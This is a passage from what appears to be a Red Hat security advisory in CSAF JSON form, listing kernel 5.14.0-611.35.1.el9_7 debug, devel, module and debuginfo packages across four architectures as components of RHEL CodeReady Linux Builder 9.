"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
